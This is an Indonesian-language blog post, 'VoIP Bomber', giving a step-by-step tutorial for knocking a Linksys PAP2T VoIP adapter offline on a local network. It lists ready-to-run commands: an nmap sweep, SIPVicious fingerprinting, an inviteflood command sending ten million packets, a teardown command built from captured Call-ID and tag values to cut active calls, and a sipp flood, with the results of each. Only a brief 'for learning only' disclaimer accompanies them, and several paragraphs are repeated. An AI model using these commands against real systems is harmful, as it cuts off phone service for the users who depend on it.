18 Mar 2012
0
18 Mar 2012
Unknown
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.80 -d
VoIP Bomber
Mungkin buat agan yang bermimpi pengen jadi Terrorist sebaiknya jangan deh, ntar ditangkap S.W.A.T, hahaha
aku lagi mau berbagi tips hack ni, ya mungkin agak mirip Terrorist kali ya...
beda banget lah gan...
perangkat tersebut hanya : VoIP ATA.
yang jelas agan harus punya,
oh ya mau tahu singkatannya??, singkatannya ini loh
VoIP = Voice Over IP, dan ATA = Analog Telephone Adapter.
oke langsung aja gan...
Perangkat ini akan saya lakukan tindakan destruktif sehingga VoIP ATA tidak bisa digunakan untuk sementara dan terputus dari jalur VoIP services. Teknik penyerangan ini berlaku pada semua pemodelan VoIP alias tidak terbatas pada topologi yang disimulasikan.
Persiapan :
1. Laptop
2. OS Backtrack, saya menggunakan Backtrack 5 code name : Revolution
3. Wlan0, saya mempergunakan jaringan wireless dalam penyerangan
1. Laptop
2. OS Backtrack, saya menggunakan Backtrack 5 code name : Revolution
3. Wlan0, saya mempergunakan jaringan wireless dalam penyerangan
Kegiatan Penyerangan :
1. Memastikan IP pada interface wlan0
Ya, saya harus memastikannya karena saya terkoneksi pada sebuah Wireless AP Router sehingga DHCP server memberikan IP untuk devices yang saya pergunakan :
1. Memastikan IP pada interface wlan0
Ya, saya harus memastikannya karena saya terkoneksi pada sebuah Wireless AP Router sehingga DHCP server memberikan IP untuk devices yang saya pergunakan :
Analisa :
Nah, laptop saya sudah mendapatkan IP dari DHCP Server, yaitu : 192.168.1.68, mari lanjutkan pada langkah berikutnya.
2. Melakukan scanning untuk mengidetifikasikan host live
Pada langkah pertama sudah didapatkan IP : 192.168.1.68, maka langkah berikutnya saya akan melakukan pencarian informasi yang lebih mendalam dengan melakukan scanning massal.
Disini hanya diperlukan sedikit analisa saja, yaitu menentukan 1 segment range IP yang akan discanning massal, maka 1 range IP tersebut adalah IP : 192.168.1.1 sampai dengan IP : 192.168.1.254.
Saya mempergunakan NMAP dengan metoda "intense scan & no ping", dengan perintah sbb :
root@bt:~# nmap -T4 -A -v -Pn 192.168.1.1-254
Analisa :
Wah...hasil laporan NMAP begitu panjang dan menggoda...pasti disukai para wanita...lol, sehingga didapatkan informasi bahwa pada IP : 192.168.1.80 terindikasi sebagai perangkat VoIP.
Kok tau itu perangkat VoIP...? gini masbro... perhatikan pada baris 29,30,31. Baris-baris tersebut menunjukan kalau itu adalah perangkat VoIP.
Wah...hasil laporan NMAP begitu panjang dan menggoda...pasti disukai para wanita...lol, sehingga didapatkan informasi bahwa pada IP : 192.168.1.80 terindikasi sebagai perangkat VoIP.
Kok tau itu perangkat VoIP...? gini masbro... perhatikan pada baris 29,30,31. Baris-baris tersebut menunjukan kalau itu adalah perangkat VoIP.
Perhatikan juga pada baris 27 "80/tcp open tcpwrapped" yang mengindikasikan bahwa perangkat VoIP tersebut mengaktifkan metoda penyetingan berbasis web base (http) yang bisa menjadi target penyerangan berikutnya..lol
Untuk lebih detailnya maka akan dilakukan proses "fingerprint" pada langkah berikutnya.
3. FingerPrint
Okay...kegiatan ini hanyalah kegiatan untuk memastikan bahwa target yang menjadi incaran adalah benar-benar target alias kagak salah sasaran.
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254
Analisa :
Uhhhuuuyyyy... ternyata benar bahwa IP 192.168.1.80 adalah perangkat VoIP dengan SIP Port 5060. Tidak hanya itu, merk dan series perangkat VoIP pun bisa didapatkan yaitu : Linksys/PAP2T-3.1.15(LS).
Uhhhuuuyyyy... ternyata benar bahwa IP 192.168.1.80 adalah perangkat VoIP dengan SIP Port 5060. Tidak hanya itu, merk dan series perangkat VoIP pun bisa didapatkan yaitu : Linksys/PAP2T-3.1.15(LS).
Mari mang....kita lanjutkan pada proses fingerprint yang lebih bermutu :
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.80 -d
Analisa:
Pusing.....?? santai gan... dari hasil fingerprint tersebut, kita mendapatkan :
1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060
2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069
7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)
Pusing.....?? santai gan... dari hasil fingerprint tersebut, kita mendapatkan :
1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060
2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069
7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)
Sungguh...mangtabs sekali informasi2 tersebut dan sangat berguna dalam melakukan penyerangan VoIP.
4. Penyerangan
Mari kita lakkukan penyerangan... ingat penyerangan iini hanya untuk pembelajaran saja, segala tindakan destruktif saya tidak bertanggung jawab.
* InviteFlood :
----------------
Teknik penyerangan yang seolah2 VoIP devices diajak untuk melakukan komunikasi dengan banyak user.
----------------
Teknik penyerangan yang seolah2 VoIP devices diajak untuk melakukan komunikasi dengan banyak user.
root@bt:/pentest/voip/inviteflood# ./inviteflood <interface> <ekstensi> <IP_Domain> <IPHost_Target> <JlhPaket_Data> root@bt:/pentest/voip/inviteflood# ./inviteflood wlan0 100 192.168.1.80 192.168.1.80 10000000
Hasil selama pengiriman paket data berlangsung :
* root@bt:/pentest/voip/sipp# ping 192.168.1.80
* root@bt:/pentest/voip/sipp# ping 192.168.1.80
PING 192.168.1.80 (192.168.1.80) 56(84) bytes of data
(berhenti tanpa respon apapun)
(berhenti tanpa respon apapun)
* Port 80 HTTP pun tewas
* Jalur VoIP tidak bisa dihubungi
* VoIP Enduser mengalami terputusnya koneksi
* Jalur VoIP tidak bisa dihubungi
* VoIP Enduser mengalami terputusnya koneksi
* Semakin banyak jumlah paket dalam yang dikirim berarti semakin lama tewasnya VoIP devices target !!
* tearDown attacking
-------------------------
-------------------------
Penyerangan dengan melumpuhkan semua client (user) yang terkoneksi pada VoIP devices.
O iya, pada Backtrack 5 aplikasi teardown tidak tersedia oleh karena itu Anda harus mengambilnya a.k.a download di : http://www.hackingvoip.com/tools/teardown.tar.gz, jangan lupa aplikasi ini membutuhkan Ruby 1.8 keatas.
O iya, pada Backtrack 5 aplikasi teardown tidak tersedia oleh karena itu Anda harus mengambilnya a.k.a download di : http://www.hackingvoip.com/tools/teardown.tar.gz, jangan lupa aplikasi ini membutuhkan Ruby 1.8 keatas.
Untuk menggunakan "tearDown" diperlukan hasil analisa dari fingerprint (proses 3), yaitu :
1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060
2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069
7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)
2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069
7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)
Mari gunakan informasi tersebut sebagai parameter penyerangan dengan tearDown, sbb :
root@bt:/pentest/voip/teardown#
./teardown <interface> <extention> <sip_proxy> <IP_target> <callID> <fromTag> <toTag>
./teardown wlan0 100 192.168.1.80 192.168.1.80 785522139741125439084511 63306138303135303133633401373935303131393234 388074baa08bb653i0
Hasil penyerangan :
* Jalur komunikasi VoIP yang dipergunakan oleh user terputus !!
* Jalur komunikasi VoIP yang dipergunakan oleh user terputus !!
* SIP protocol attacking :
----------------------------
----------------------------
Penyerangan dengan cara memberikan koneksi "total-call" user yang berlebihan sehingga SIP tidak lagi mampu memberikan layanan.
root@bt:/pentest/voip/sipp# ./sipp -sn uac <ip_target>
root@bt:/pentest/voip/sipp# ./sipp -sn uac 192.168.1.80
Hasil penyerangan :
* Layanan SIP terganggu bahkan terhenti karena adanya total-call yang berlebihan karena limit-calls = 48 sedangkan total-calls sudah mencapai = 365.
* Penyerangan bisa dilipatgandakan dengan menekah tombol "+" (tanda tanda kutip)
Akhirnya selesai sudah tulisan ini saya buat, tiada maksud untuk menambah kejahatan otak...
Semuanya hanya untuk pembelajaran saja, jika anda mau dosa hanya agan yang tanggung.
Semuanya hanya untuk pembelajaran saja, jika anda mau dosa hanya agan yang tanggung.
Jika Anda menyukai Artikel di blog ini, Silahkan
klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Tak-Tik IT
Related Articles :
Langganan:
Posting Komentar (Atom)
0 Responses to “VoIP Bomber”
Posting Komentar
Komentarlah Sebaik Saya Menyuguhkan Artikel.
Karena Komentar Anda Merupakan Emas Bagi Blog Saya.